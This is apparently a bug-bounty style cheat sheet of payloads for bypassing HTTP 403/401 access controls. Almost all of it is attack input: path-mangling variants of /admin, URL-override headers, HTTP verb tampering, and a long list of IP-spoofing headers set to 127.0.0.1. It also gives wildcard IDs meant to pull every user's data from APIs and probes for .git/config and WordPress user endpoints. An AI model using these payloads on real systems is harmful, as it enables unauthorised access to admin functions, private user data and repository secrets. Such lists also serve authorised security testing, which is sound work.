Bypass 403 / 401
Many ways to bypass 403/401
/admin -> 403 or 302
/Admin
/AdMin
/admin/
/admin/.
//admin//
/.;/admin
/./admin/..
/admin.json
/;/admin
//;//admin
/admi%6e [n is url encoded to %6e]
/%2e/admin
/admin#
/admin;/
/admin/~
/./admin/./
/admin?param
/admin..;/
/admin%20
/admin%09
/admin/..;/
/static../admin.jsp
/admin..;/
/../admin
/..;/admin
X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin
Bypass 403 (Forbidden)
- Using "X-Original-URL" header
GET /admin HTTP/1.1
Host: target.com
Try this to bypass
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
- Appending %2e after the first slash
http://target.com/admin => 403
Try this to bypass
http://target.com/%2e/admin => 200
- Try add dot (.) slash (/) and semicolon (;) in the URL
http://target.com/admin => 403
Try this to bypass
http://target.com/secret/. => 200
http://target.com//secret// => 200
http://target.com/./secret/.. => 200
http://target.com/;/secret => 200
http://target.com/.;/secret => 200
http://target.com//;//secret => 200
- Add "..;/" after the directory name
http://target.com/admin
Try this to bypass
http://target.com/admin..;/
- Try to uppercase the alphabet in the url
http://target.com/admin
Try this to bypass
http://target.com/aDmIN
- Via Web Cache Poisoning
GET /anything HTTP/1.1
Host: victim.com
X-Original-URL: /admin
API
/api/67898555007/users -> 403
/api//users
/api\\users
/api/v1/user/id -> 403
/api/vl/user/id.json
/api/vl/user/id?
/api/vl/user/id/
/api/v2/user/id
/api/vl/user/id&accountdetail
/api/v1/user/yourid&victimid
X-Original-Url: /api/v1/user/id
Send a wildcard (*, %, ., _) instead of an ID, some backend might respond with the data of all the users.
GET /api/users/* HTTP/1.1
GET /api/users/% HTTP/1.1
GET /api/users/_ HTTP/1.1
GET /api/users/. HTTP/1.1
Git
.git:
If a path with .git/ = 403, then /.git/config might be 200!
Wordpress
X-Rewrite-Url
Header can be used to bypass WordPress 403 pages.
POST /xmlrpc HTTP/1.1
Host: https://blah.com
X-Rewrite-Url: xmlrpc.php
X-Rewrite-Url: wp-json/v2/users
X-Rewrite-Url: wp-login.php
Burp Extensions - 403 Bypasser
HTTP Verb Tampering
Change request method from GET to TRACE, etc.
If the application supports method override header then you can also test like this way:
POST /admin HTTP/1.1
Host: target.com
X-http-method-override: GET
Or
X-http-override: GET
FUZZ
/FUZZ/admin
/admin/FUZZ
/adminFUZZ
Content-Length:0
curl -X POST -H “Content-Length:0” https://www.redacted.com
403 Header Payloads
GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin
OR
GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin
Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1